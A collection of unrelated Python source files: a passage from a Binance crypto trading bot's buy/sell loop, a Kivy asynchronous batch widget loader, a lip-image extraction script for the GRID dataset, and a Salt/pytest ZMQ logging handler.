volume: # only buy if the there are no active trades on the coin if coin not in coins_bought: print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}") if TEST_MODE: orders[coin] = [{ 'symbol': coin, 'orderId': 0, 'time': datetime.now().timestamp() }] # Log trade if LOG_TRADES: write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}") continue # try to create a real order if the test orders did not raise an exception try: buy_limit = client.create_order( symbol = coin, side = 'BUY', type = 'MARKET', quantity = volume[coin] ) # error handling here in case position cannot be placed except Exception as e: print(e) # run the else block if the position has been placed and return order info else: orders[coin] = client.get_all_orders(symbol=coin, limit=1) # binance sometimes returns an empty list, the code will wait here until binance returns the order while orders[coin] == []: print('Binance is being slow in returning the order, calling the API again...') orders[coin] = client.get_all_orders(symbol=coin, limit=1) time.sleep(1) else: playsound('audio_files/buy.mp3') print('Order returned, saving order to file') # Log trade if LOG_TRADES: write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}") else: print(f'Signal detected, but there is already an active trade on {coin}') return orders, last_price, volume def sell_coins(): '''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold''' global hsp_head, session_profit last_price = get_price(False) # don't populate rolling window #last_price = get_price(add_to_historical=True) # don't populate rolling window coins_sold = {} for coin in list(coins_bought): # define stop loss and take profit TP = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['take_profit']) / 100 SL = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['stop_loss']) / 100 LastPrice = float(last_price[coin]['price']) BuyPrice = float(coins_bought[coin]['bought_at']) PriceChange = float((LastPrice - BuyPrice) / 
BuyPrice * 100) # check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used if LastPrice > TP and USE_TRAILING_STOP_LOSS: # increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL) coins_bought[coin]['take_profit'] = PriceChange + TRAILING_TAKE_PROFIT coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.2f} and SL {coins_bought[coin]['stop_loss']:.2f} accordingly to lock-in profit") continue # check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case if LastPrice < SL or LastPrice > TP and not USE_TRAILING_STOP_LOSS: print(f"{txcolors.SELL_PROFIT if PriceChange > 0. else txcolors.SELL_LOSS}TP or SL reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}") # try to create a real order try: if not TEST_MODE: sell_coins_limit = client.create_order( symbol = coin, side = 'SELL', type = 'MARKET', quantity = coins_bought[coin]['volume'] ) # error handling here in case position cannot be placed except Exception as e: print(e) # run the else block if coin has been sold and create a dict for each coin sold else: coins_sold[coin] = coins_bought[coin] # prevent system from buying this coin for the next TIME_DIFFERENCE minutes volatility_cooloff[coin] = datetime.now() # Log trade if LOG_TRADES: profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume'])* (1-(TRADING_FEE*2)) # adjust for trading fee here write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit:.2f} {PriceChange-(TRADING_FEE*2):.2f}%") playsound('audio_files/sell.mp3') session_profit=session_profit + (PriceChange-(TRADING_FEE*2)) continue # no action; print once every TIME_DIFFERENCE if hsp_head == 1: if len(coins_bought) > 0: print(f'TP or SL not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange > 0. else txcolors.SELL_LOSS}{PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}') if hsp_head == 1 and len(coins_bought) == 0: print(f'Not holding any coins') return coins_sold def update_coin(json_object, param1, param2): """ Updates 2 values in any coin's json data. 
param1: the coin's SL/TP param2: the coin's SL/TP Example: "EXAMPLECOIN": { "symbol": "EXAMPLECOIN", "orderid": 483289970, "timestamp": 1623244344267, "bought_at": "14.25700000", "volume": 2.104, "stop_loss": -1, <--- will change any 2 of these values "take_profit": 10 """ pass with open(coins_bought_file_path, "r") as jsonFile: updated_coins = {} coins = json.load(jsonFile) for coin in coins: coins[coin][param1] = TAKE_PROFIT coins[coin][param2] = -STOP_LOSS updated_coins[coin] = coins[coin] jsonFile.close() with open(coins_bought_file_path, "w") as jsonFile: json.dump(updated_coins, jsonFile, indent=4) def update_portfolio(orders, last_price, volume): '''add every coin bought to our portfolio for tracking/selling later''' if DEBUG: print(orders) for coin in orders: coins_bought[coin] = { 'symbol': orders[coin][0]['symbol'], 'orderid': orders[coin][0]['orderId'], 'timestamp': orders[coin][0]['time'], 'bought_at': last_price[coin]['price'], 'volume': volume[coin], 'stop_loss': -STOP_LOSS, 'take_profit': TAKE_PROFIT, } # save the coins in a json file in the same directory with open(coins_bought_file_path, 'w') as file: json.dump(coins_bought, file, indent=4) print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file') def remove_from_portfolio(coins_sold): '''Remove coins sold due to SL or TP from portfolio''' for coin in coins_sold: coins_bought.pop(coin) with open(coins_bought_file_path, 'w') as file: json.dump(coins_bought, file, indent=4) def write_log(logline): timestamp = datetime.now().strftime("%d/%m %H:%M:%S") with open(LOG_FILE,'a+') as f: f.write(timestamp + ' ' + logline + '\n') def _count_text_lines(file_name): with open(file_name) as f: for i, l in enumerate(f): pass return i + 1 def log_session_profit(file_name): """ Logs session profit/losses to file_name """ f = open(file_name, "r+") print(f"Session {_count_text_lines(file_name)} ended. 
Profits recorded in {file_name}.") string = f"===== {datetime.date(datetime.now())} =====\n" if string not in f: print(string, str(f)) f.write(string) f.write(f"Session # {str(_count_text_lines(file_name))} profit: $ {(QUANTITY * session_profit)/100:.2f} \n") f.close() sys.exit() if __name__ == '__main__': # Load arguments then parse settings args = parse_args() mymodule = {} # set to false at Start global bot_paused bot_paused = False DEFAULT_CONFIG_FILE = 'config.yml' DEFAULT_CREDS_FILE = 'creds.yml' config_file = args.config if args.config else DEFAULT_CONFIG_FILE creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE parsed_config = load_config(config_file) parsed_creds = load_config(creds_file) # Default no debugging DEBUG = False # Load system vars TEST_MODE = parsed_config['script_options']['TEST_MODE'] LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES') LOG_FILE = parsed_config['script_options'].get('LOG_FILE') DEBUG_SETTING = parsed_config['script_options'].get('DEBUG') AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER') # Load trading vars PAIR_WITH = parsed_config['trading_options']['PAIR_WITH'] QUANTITY = parsed_config['trading_options']['QUANTITY'] MAX_COINS = parsed_config['trading_options']['MAX_COINS'] FIATS = parsed_config['trading_options']['FIATS'] TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE'] RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL'] CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE'] STOP_LOSS = parsed_config['trading_options']['STOP_LOSS'] TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT'] CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST'] TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST'] USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS'] TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS'] TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT'] TRADING_FEE = parsed_config['trading_options']['TRADING_FEE'] SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES'] if DEBUG_SETTING or args.debug: DEBUG = True # Load creds for correct environment access_key, secret_key = load_correct_creds(parsed_creds) if DEBUG: print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}') print(f'Your credentials have been loaded from {creds_file}') # Authenticate with the client, Ensure API key is good before continuing if AMERICAN_USER: client = Client(access_key, secret_key, tld='us') else: client = Client(access_key, secret_key) # If the users has a bad / incorrect API key. # this will stop the script from starting, and display a helpful error. 
api_ready, msg = test_api_key(client, BinanceAPIException) if api_ready is not True: exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}') # Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)] # try to load all the coins bought by the bot if the file exists and is not empty coins_bought = {} # path to the saved coins_bought file coins_bought_file_path = 'coins_bought.json' # rolling window of prices; cyclical queue historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL) hsp_head = -1 # prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago volatility_cooloff = {} # use separate files for testing and live trading if TEST_MODE: coins_bought_file_path = 'test_' + coins_bought_file_path # if saved coins_bought json file exists and it's not empty then load it if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size!= 0: with open(coins_bought_file_path) as file: coins_bought = json.load(file) print('Press Ctrl-Q to stop the script') if not TEST_MODE: if not args.notimeout: # if notimeout skip this (fast for dev tests) print('WARNING: You are using the Mainnet and live funds. Waiting 5 seconds as a security measure') time.sleep(5) signals = glob.glob("signals/*.exs") for filename in signals: for line in open(filename): try: os.remove(filename) except: if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}') if os.path.isfile("signals/paused.exc"): try: os.remove("signals/paused.exc") except: if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}') # load signalling modules try: if len(SIGNALLING_MODULES) > 0: for module in SIGNALLING_MODULES: print(f'Starting {module}') mymodule[module] = importlib.import_module(module) t = threading.Thread(target=mymodule[module].do_work, args=()) t.daemon = True t.start() time.sleep(2) else: print(f'No modules to load {SIGNALLING_MODULES}') except Exception as e: print(e) # seed initial prices get_price() READ_TIMEOUT_COUNT=0 CONNECTION_ERROR_COUNT = 0 while True: try: update_coin(coins_bought_file_path, 'stop_loss', 'take_profit') # Update SL/TP of all coins in coins_bought.json: orders, last_price, volume = buy() update_portfolio(orders, last_price, volume) coins_sold = sell_coins() remove_from_portfolio(coins_sold) except ReadTimeout as rt: READ_TIMEOUT_COUNT += 1 print(f'{txcolors.WARNING}We got a timeout error from from binance. Going to re-loop. Current Count: {READ_TIMEOUT_COUNT}\n{rt}{txcolors.DEFAULT}') except ConnectionError as ce: CONNECTION_ERROR_COUNT +=1 print(f'{txcolors.WARNING}We got a timeout error from from binance. Going to re-loop. Current Count: {CONNECTION_ERROR_COUNT}\n{ce}{txcolors.DEFAULT}') except (KeyboardInterrupt, SystemExit): # writes total session profit to activitylogs once session ended if TEST_MODE: log_session_profit("activitylogs/TEST_profit_losses") else: log_session_profit("activitylogs/LIVE_profit_losses")
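

# Hedged worked example (illustrative only, never called by the bot): the
# take-profit / stop-loss arithmetic used in sell_coins() above, with made-up
# numbers instead of config values. A coin bought at 100 with TAKE_PROFIT=0.8
# and STOP_LOSS=5 gives TP=100.8 and SL=95.0; once the price crosses TP with
# USE_TRAILING_STOP_LOSS enabled, the thresholds are re-anchored to the
# current gain instead of selling immediately.
def _example_tp_sl_math():
    bought_at = 100.0      # example entry price in PAIR_WITH
    take_profit = 0.8      # percent, as configured via TAKE_PROFIT
    stop_loss = -5.0       # percent, stored negated as in coins_bought

    TP = bought_at + (bought_at * take_profit) / 100       # 100.8
    SL = bought_at + (bought_at * stop_loss) / 100         # 95.0

    last_price = 102.0                                     # example market price
    price_change = (last_price - bought_at) / bought_at * 100   # 2.0 %
    # With trailing enabled the bot would now set
    #   take_profit = price_change + TRAILING_TAKE_PROFIT
    #   stop_loss   = take_profit - TRAILING_STOP_LOSS
    # so the position is kept open with a raised floor under the gain.
    return TP, SL, price_change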
batch_loader.py
import asyncio from logging import getLogger from threading import Thread from time import time from typing import Any, Callable, Dict, Iterable from kivy.clock import mainthread, Clock from kivy.event import EventDispatcher from kivy.uix.widget import Widget from tesseractXplore.app import get_app from tesseractXplore.widgets import ModelListItem, ImageMetaTile REPORT_RATE = 1 / 30 # Report progress to UI at 30 FPS logger = getLogger().getChild(__name__) class BatchRunner(EventDispatcher): """ Runs batches of tasks asynchronously in a separate thread from the main GUI thread Events: on_progress: Called periodically to report progress on_load: Called when a work item is processed on_complete: Called when all work items are processed """ def __init__(self, runner_callback: Callable, worker_callback: Callable, loop=None, **kwargs): """ Args: runner_callback: Callback for main event loop entry point worker_callback: Callback to process work items loop: Event loop to use (separate from main kivy event loop) """ # Schedule all events to run on the main thread self.dispatch = mainthread(self.dispatch) self.register_event_type('on_progress') self.register_event_type('on_load') self.register_event_type('on_complete') super().__init__(**kwargs) self.loop = loop or get_app().bg_loop self.thread = None self.queues = [] self.worker_tasks = [] self.runner_callback = runner_callback self.worker_callback = worker_callback def add_batch(self, items: Iterable, **kwargs: Dict): """ Add a batch of items to the queue (from another thread) Args: items: Items to be passed to worker callback kwargs: Optional keyword arguments to be passed to worker callback """ def _add_batch(): queue = asyncio.Queue() for item in items: queue.put_nowait((item, kwargs)) self.queues.append(queue) self.loop.call_soon_threadsafe(_add_batch) def start_thread(self): """ Start the background loader event loop in a new thread """ def _start(): asyncio.run_coroutine_threadsafe(self.start(), self.loop) tbatch = Thread(target=_start) # Need this to get killed when app closes tbatch.setDaemon(True) tbatch.start() async def start(self): """ Start the background loader event loop """ logger.info(f'Loader: Starting {len(self.queues)} batches') for queue in self.queues: task = asyncio.create_task(self.worker(queue)) self.worker_tasks.append(task) await self.runner_callback() async def worker(self, queue: asyncio.Queue): """ Run a worker to process items on a single queue """ while True: item, kwargs = await queue.get() results = await self.worker_callback(item, **kwargs) self.dispatch('on_load', results) queue.task_done() await asyncio.sleep(0) async def join(self): """ Wait for all queues to be initialized and then processed """ while not self.queues: await asyncio.sleep(0.1) for queue in self.queues: await queue.join() async def stop(self): """ Safely stop the event loop """ logger.info('Loader: stopping workers') for task in self.worker_tasks: task.cancel() self.loop.run_until_complete(asyncio.gather(*self.worker_tasks, return_exceptions=True)) # Default handlers def on_load(self, *_): pass def on_complete(self, *_): pass def on_progress(self, *_): pass class BatchLoader(BatchRunner): """ Loads batches of items with periodic progress updates sent back to the UI """ def __init__(self, **kwargs): super().__init__(runner_callback=self.run, **kwargs) self.event = None self.items_complete = None self.start_time = None self.lock = asyncio.Lock() async def run(self): """ Run batches, wait to complete, and gracefully shut down """ 
self.start_progress() await self.join() self.stop_progress() self.dispatch('on_complete', None) await self.stop() def start_progress(self): """ Schedule event to periodically report progress """ self.start_time = time() self.items_complete = 0 self.event = Clock.schedule_interval(self.report_progress, REPORT_RATE) async def increment_progress(self): """ Async-safe function to increment progress """ async with self.lock: self.items_complete += 1 def report_progress(self, *_): """ Report how many items have been loaded so far """ self.dispatch('on_progress', self.items_complete) def stop_progress(self): """ Unschedule progress event and log total execution time """ if self.event: self.event.cancel() self.event = None logger.info( f'Loader: Finished loading {self.items_complete} items ' f'in {time() - self.start_time} seconds' ) def cancel(self): """ Safely stop the event loop and thread (from another thread) """ logger.info(f'Loader: Canceling {len(self.queues)} batches') self.loop.call_soon_threadsafe(self.stop_progress) asyncio.run_coroutine_threadsafe(self.stop(), self.loop) class WidgetBatchLoader(BatchLoader): """ Generic loader for widgets that perform some sort of I/O on initialization """ def __init__(self, widget_cls, **kwargs): super().__init__(worker_callback=self.load_widget, **kwargs) self.widget_cls = widget_cls async def load_widget(self, item: Any, parent: Widget = None, **kwargs) -> Widget: """ Load information for a new widget """ logger.debug(f'Processing item: {item}') widget = self.widget_cls(item, **kwargs) self.add_widget(widget, parent) await self.increment_progress() return widget @mainthread def add_widget(self, widget: Widget, parent: Widget): """ Add a widget to its parent on the main thread """ if parent: parent.add_widget(widget) class ModelBatchLoader(WidgetBatchLoader): """ Loads batches of ModelListItems """ def __init__(self, **kwargs): super().__init__(widget_cls=ModelListItem, **kwargs) def add_widget(self, widget: Widget, parent: Widget): """ Add a ModelListItem to its parent list and bind its click event """ super().add_widget(widget, parent) mainthread(get_app().bind_to_select_model)(widget) class ImageBatchLoader(WidgetBatchLoader): """ Loads batches of ImageMetaTiles """ def __init__(self, **kwargs): super().__init__(widget_cls=ImageMetaTile, **kwargs) def add_widget(self, widget: Widget, parent: Widget): """ Add an ImageMetaTiles to its parent view and bind its click event """ super().add_widget(widget, parent) self.bind_click(widget) @mainthread def bind_click(self, widget): widget.bind(on_touch_down=get_app().image_selection_controller.on_image_click) class ImageBatchLoaderOnline(WidgetBatchLoader): """ Loads batches of ImageMetaTiles for online version""" def __init__(self, **kwargs): super().__init__(widget_cls=ImageMetaTile, **kwargs) def add_widget(self, widget: Widget, parent: Widget): """ Add an ImageMetaTiles to its parent view and bind its click event """ super().add_widget(widget, parent) self.bind_click(widget) @mainthread def bind_click(self, widget): widget.bind(on_touch_down=get_app().image_selection_online_controller.on_image_click)
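# --- Illustrative usage sketch (not part of the module) ---------------------
# How a controller might drive ImageBatchLoader, based only on the public API
# above: bind the events, queue one batch of work items, then start the
# background thread.  `image_paths` and `photo_grid` are placeholders, not
# names used elsewhere in this project.

def example_load_images(image_paths, photo_grid):
    loader = ImageBatchLoader()
    loader.bind(on_progress=lambda _, done: print(f'{done} images loaded'))
    loader.bind(on_complete=lambda *_: print('all batches finished'))
    loader.add_batch(image_paths, parent=photo_grid)
    loader.start_thread()
    # keep a reference so the batch can later be stopped with loader.cancel()
    return loader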
extract_lip.py
import os import cv2 import glob import time import numpy as np from multiprocessing import Pool, Process, Queue def get_position(size, padding=0.25): x = [0.000213256, 0.0752622, 0.18113, 0.29077, 0.393397, 0.586856, 0.689483, 0.799124, 0.904991, 0.98004, 0.490127, 0.490127, 0.490127, 0.490127, 0.36688, 0.426036, 0.490127, 0.554217, 0.613373, 0.121737, 0.187122, 0.265825, 0.334606, 0.260918, 0.182743, 0.645647, 0.714428, 0.793132, 0.858516, 0.79751, 0.719335, 0.254149, 0.340985, 0.428858, 0.490127, 0.551395, 0.639268, 0.726104, 0.642159, 0.556721, 0.490127, 0.423532, 0.338094, 0.290379, 0.428096, 0.490127, 0.552157, 0.689874, 0.553364, 0.490127, 0.42689] y = [0.106454, 0.038915, 0.0187482, 0.0344891, 0.0773906, 0.0773906, 0.0344891, 0.0187482, 0.038915, 0.106454, 0.203352, 0.307009, 0.409805, 0.515625, 0.587326, 0.609345, 0.628106, 0.609345, 0.587326, 0.216423, 0.178758, 0.179852, 0.231733, 0.245099, 0.244077, 0.231733, 0.179852, 0.178758, 0.216423, 0.244077, 0.245099, 0.780233, 0.745405, 0.727388, 0.742578, 0.727388, 0.745405, 0.780233, 0.864805, 0.902192, 0.909281, 0.902192, 0.864805, 0.784792, 0.778746, 0.785343, 0.778746, 0.784792, 0.824182, 0.831803, 0.824182] x, y = np.array(x), np.array(y) x = (x + padding) / (2 * padding + 1) y = (y + padding) / (2 * padding + 1) x = x * size y = y * size return np.array(list(zip(x, y))) def cal_area(anno): return (anno[:,0].max() - anno[:,0].min()) * (anno[:,1].max() - anno[:,1].min()) def transformation_from_points(points1, points2): points1 = points1.astype(np.float64) points2 = points2.astype(np.float64) c1 = np.mean(points1, axis=0) c2 = np.mean(points2, axis=0) points1 -= c1 points2 -= c2 s1 = np.std(points1) s2 = np.std(points2) points1 /= s1 points2 /= s2 U, S, Vt = np.linalg.svd(points1.T * points2) R = (U * Vt).T return np.vstack([np.hstack(((s2 / s1) * R, c2.T - (s2 / s1) * R * c1.T)), np.matrix([0., 0., 1.])]) def anno_img(img_dir, anno_dir, save_dir): files = list(os.listdir(img_dir)) files = [file for file in files if(file.find('.jpg') != -1)] shapes = [] for file in files: img = os.path.join(img_dir, file) anno = os.path.join(anno_dir, file).replace('.jpg', '.txt') I = cv2.imread(img) count = 0 with open(anno, 'r') as f: annos = [line.strip().split('\t') for line in f.readlines()] if(len(annos) == 0): continue for (i, anno) in enumerate(annos): x, y = [], [] for p in anno: _, __ = p[1:-1].split(',') _, __ = float(_), float(__) x.append(_) y.append(__) annos[i] = np.stack([x, y], 1) anno = sorted(annos, key = cal_area, reverse=True)[0] shape = [] shapes.append(anno[17:]) front256 = get_position(256) M_prev = None for (shape, file) in zip(shapes, files): img = os.path.join(img_dir, file) I = cv2.imread(img) M = transformation_from_points(np.matrix(shape), np.matrix(front256)) img = cv2.warpAffine(I, M[:2], (256, 256)) (x, y) = front256[-20:].mean(0).astype(np.int32) w = 160//2 img = img[y-w//2:y+w//2,x-w:x+w,...] 
cv2.imwrite(os.path.join(save_dir, file), img) def run(files): tic = time.time() count = 0 print('n_files:{}'.format(len(files))) for (img_dir, anno_dir, save_dir) in files: anno_img(img_dir, anno_dir, save_dir) count += 1 if(count % 1000 == 0): print('eta={}'.format((time.time()-tic)/(count) * (len(files) - count) / 3600.0)) if(__name__ == '__main__'): with open('paths.txt', 'r') as f: data = [line.strip() for line in f.readlines()] data = list(set([os.path.split(file)[0] for file in data])) annos = [name.replace('GRID_imgs/', 'GRID/landmarks/') for name in data] targets = [name.replace('GRID_imgs/', 'GRID/lip/') for name in data] for dst in targets: if(not os.path.exists(dst)): os.makedirs(dst) data = list(zip(data, annos, targets)) processes = [] n_p = 4 bs = len(data) // n_p for i in range(n_p): if(i == n_p - 1): bs = len(data) p = Process(target=run, args=(data[:bs],)) data = data[bs:] p.start() processes.append(p) assert(len(data) == 0) for p in processes: p.join()
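# --- Illustrative alternative (not part of the original script) --------------
# Pool is imported above but never used; the manual chunking in __main__ could
# equally be expressed with a Pool, which does the splitting and joining
# itself.  This is a sketch under that assumption, not the author's method.

def run_with_pool(jobs, n_workers=4):
    """jobs: list of (img_dir, anno_dir, save_dir) tuples, as built in __main__."""
    with Pool(processes=n_workers) as pool:
        pool.starmap(anno_img, jobs)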
pytest_log_handler.py
# -*- coding: utf-8 -*- """ pytestsalt.salt.log_handlers.pytest_log_handler ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Salt External Logging Handler """ import atexit import copy import logging import os import pprint import socket import sys import threading import traceback import salt.utils.msgpack import salt.utils.stringutils from salt._logging.impl import LOG_LEVELS from salt._logging.mixins import ExcInfoOnLogLevelFormatMixin from salt._logging.mixins import NewStyleClassMixin from salt.utils.zeromq import zmq __virtualname__ = "pytest_log_handler" log = logging.getLogger(__name__) def __virtual__(): role = __opts__["__role"] pytest_key = "pytest-{}".format(role) pytest_config = __opts__[pytest_key] if "log" not in pytest_config: return False, "No 'log' key in opts {} dictionary".format(pytest_key) log_opts = pytest_config["log"] if "port" not in log_opts: return ( False, "No 'port' key in opts['pytest']['log'] or opts['pytest'][{}]['log']".format( __opts__["role"] ), ) if salt.utils.msgpack.HAS_MSGPACK is False: return False, "msgpack was not importable. Please install msgpack." if zmq is None: return False, "zmq was not importable. Please install pyzmq." return True def setup_handlers(): role = __opts__["__role"] pytest_key = "pytest-{}".format(role) pytest_config = __opts__[pytest_key] log_opts = __opts__[pytest_key]["log"] host_addr = log_opts.get("host") if not host_addr: import subprocess if log_opts["pytest_windows_guest"] is True: proc = subprocess.Popen("ipconfig", stdout=subprocess.PIPE) for line in proc.stdout.read().strip().encode(__salt_system_encoding__).splitlines(): if "Default Gateway" in line: parts = line.split() host_addr = parts[-1] break else: proc = subprocess.Popen( "netstat -rn | grep -E '^0.0.0.0|default' | awk '{ print $2 }'", shell=True, stdout=subprocess.PIPE, ) host_addr = proc.stdout.read().strip().encode(__salt_system_encoding__) host_port = log_opts["port"] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((host_addr, host_port)) except socket.error as exc: # Don't even bother if we can't connect log.warning("Cannot connect back to log server: %s", exc) return finally: sock.close() pytest_log_prefix = log_opts.get("prefix") level = LOG_LEVELS[(log_opts.get("level") or "error").lower()] handler = ZMQHandler(host=host_addr, port=host_port, log_prefix=pytest_log_prefix, level=level) handler.setLevel(level) handler.start() return handler class ZMQHandler(ExcInfoOnLogLevelFormatMixin, logging.Handler, NewStyleClassMixin): # We offload sending the log records to the consumer to a separate # thread because PUSH socket's WILL block if the receiving end can't # receive fast engough, thus, also blocking the main thread. # # To achive this, we create an inproc zmq.PAIR, which also guarantees # message delivery, but should be way faster than the PUSH. # We also set some high enough high water mark values to cope with the # message flooding. # # We also implement a start method which is deferred until sending the # first message because, logging handlers, on platforms which support # forking, are inherited by forked processes, and we don't want the ZMQ # machinery inherited. # For the cases where the ZMQ machinery is still inherited because a # process was forked after ZMQ has been prep'ed up, we check the handler's # pid attribute against, the current process pid. If it's not a match, we # reconnect the ZMQ machinery. 
def __init__(self, host="127.0.0.1", port=3330, log_prefix=None, level=logging.NOTSET): super().__init__(level=level) self.pid = os.getpid() self.push_address = "tcp://{}:{}".format(host, port) self.log_prefix = self._get_log_prefix(log_prefix) self.context = self.proxy_address = self.in_proxy = self.proxy_thread = None self._exiting = False def _get_log_prefix(self, log_prefix): if log_prefix is None: return if sys.argv[0] == sys.executable: cli_arg_idx = 1 else: cli_arg_idx = 0 cli_name = os.path.basename(sys.argv[cli_arg_idx]) return log_prefix.format(cli_name=cli_name) def start(self): if self.pid != os.getpid(): self.stop() self._exiting = False if self._exiting is True: return if self.in_proxy is not None: return atexit.register(self.stop) context = in_proxy = None try: context = zmq.Context() self.context = context except zmq.ZMQError as exc: sys.stderr.write( "Failed to create the ZMQ Context: {}\n{}\n".format(exc, traceback.format_exc(exc)) ) sys.stderr.flush() # Let's start the proxy thread socket_bind_event = threading.Event() self.proxy_thread = threading.Thread( target=self._proxy_logs_target, args=(socket_bind_event,) ) self.proxy_thread.daemon = True self.proxy_thread.start() # Now that we discovered which random port to use, lest's continue with the setup if socket_bind_event.wait(5) is not True: sys.stderr.write("Failed to bind the ZMQ socket PAIR\n") sys.stderr.flush() context.term() return # And we can now also connect the messages input side of the proxy try: in_proxy = self.context.socket(zmq.PAIR) in_proxy.set_hwm(100000) in_proxy.connect(self.proxy_address) self.in_proxy = in_proxy except zmq.ZMQError as exc: if in_proxy is not None: in_proxy.close(1000) sys.stderr.write( "Failed to bind the ZMQ PAIR socket: {}\n{}\n".format( exc, traceback.format_exc(exc) ) ) sys.stderr.flush() def stop(self): if self._exiting: return self._exiting = True try: atexit.unregister(self.stop) except AttributeError: # Python 2 try: atexit._exithandlers.remove((self.stop, (), {})) except ValueError: # The exit handler isn't registered pass try: if self.in_proxy is not None: self.in_proxy.send(salt.utils.msgpack.dumps(None)) self.in_proxy.close(1500) if self.context is not None: self.context.term() if self.proxy_thread is not None and self.proxy_thread.is_alive(): self.proxy_thread.join(5) except Exception as exc: # pylint: disable=broad-except sys.stderr.write( "Failed to terminate ZMQHandler: {}\n{}\n".format(exc, traceback.format_exc(exc)) ) sys.stderr.flush() raise finally: self.context = self.in_proxy = self.proxy_address = self.proxy_thread = None def format(self, record): msg = super().format(record) if self.log_prefix: import salt.utils.stringutils msg = "[{}] {}".format( salt.utils.stringutils.to_unicode(self.log_prefix), salt.utils.stringutils.to_unicode(msg), ) return msg def prepare(self, record): msg = self.format(record) record = copy.copy(record) record.msg = msg # Reduce network bandwidth, we don't need these any more record.args = None record.exc_info = None record.exc_text = None record.message = None # redundant with msg # On Python >= 3.5 we also have stack_info, but we've formatted altready so, reset it record.stack_info = None try: return salt.utils.msgpack.dumps(record.__dict__, use_bin_type=True) except TypeError as exc: # Failed to serialize something with msgpack logging.getLogger(__name__).error( "Failed to serialize log record: %s.\n%s", exc, pprint.pformat(record.__dict__) ) self.handleError(record) def emit(self, record): """ Emit a record. 
Writes the LogRecord to the queue, preparing it for pickling first. """ # Python's logging machinery acquires a lock before calling this method # that's why it's safe to call the start method wihtout an explicit acquire if self._exiting: return self.start() if self.in_proxy is None: sys.stderr.write( "Not sending log message over the wire because " "we were unable to properly configure a ZMQ PAIR socket.\n" ) sys.stderr.flush() return try: msg = self.prepare(record) self.in_proxy.send(msg) except SystemExit: pass except Exception: # pylint: disable=broad-except self.handleError(record) def _proxy_logs_target(self, socket_bind_event): context = zmq.Context() out_proxy = pusher = None try: out_proxy = context.socket(zmq.PAIR) out_proxy.set_hwm(100000) proxy_port = out_proxy.bind_to_random_port("tcp://127.0.0.1") self.proxy_address = "tcp://127.0.0.1:{}".format(proxy_port) except zmq.ZMQError as exc: if out_proxy is not None: out_proxy.close(1000) context.term() sys.stderr.write( "Failed to bind the ZMQ PAIR socket: {}\n{}\n".format( exc, traceback.format_exc(exc) ) ) sys.stderr.flush() return try: pusher = context.socket(zmq.PUSH) pusher.set_hwm(100000) pusher.connect(self.push_address) except zmq.ZMQError as exc: if pusher is not None: pusher.close(1000) context.term() sys.stderr.write( "Failed to connect the ZMQ PUSH socket: {}\n{}\n".format( exc, traceback.format_exc(exc) ) ) sys.stderr.flush() socket_bind_event.set() sentinel = salt.utils.msgpack.dumps(None) while True: try: msg = out_proxy.recv() if msg == sentinel: # Received sentinel to stop break pusher.send(msg) except zmq.ZMQError as exc: sys.stderr.write( "Failed to proxy log message: {}\n{}\n".format(exc, traceback.format_exc(exc)) ) sys.stderr.flush() break # Close the receiving end of the PAIR proxy socket out_proxy.close(0) # Allow, the pusher queue to send any messsges in it's queue for # the next 1.5 seconds pusher.close(1500) context.term()
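# --- Illustrative consumer sketch (not part of this handler) -----------------
# The PULL side lives in the pytest process and is not shipped with this
# module.  A minimal sketch of what it is assumed to look like: bind a PULL
# socket on the agreed port (3330 matches the handler default), unpack each
# msgpack-encoded record dict and re-emit it through the local logging
# machinery.  The None guard and the shutdown mechanism are assumptions here.

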